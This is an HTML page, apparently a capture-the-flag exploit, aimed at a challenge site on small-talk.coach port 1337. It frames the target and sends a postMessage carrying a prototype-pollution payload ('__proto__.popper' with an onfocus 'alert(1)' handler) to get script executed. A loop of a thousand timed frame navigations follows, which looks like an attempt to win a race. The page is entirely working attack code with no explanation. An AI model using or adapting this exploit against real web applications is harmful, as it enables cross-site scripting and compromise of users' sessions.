<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <iframe src="https://small-talk.coach:1337/" id='ifr'></iframe>
    <script>
        var times = 0;
        var max = 1000;
        function race() {
            setTimeout(function(){
            ifr = document.getElementById('ifr');
            ifr.contentWindow.frames[0].location = "https://www.baidu.com/";
        },10)
            times++;
            if (times<max) {
                race();
            } else {

            }
        }
        setTimeout(function(){race()}, 5000);
        ifr = document.getElementById('ifr');
        ifr.contentWindow.postMessage('{"author":"1", "__proto__.popper":{"tabindex":1, "onfocus":"alert(1)"}}');
        ifr.contentWindow.location = "https://small-talk.coach:1337/#send-tooltip";
    </script>
</body>
</html>
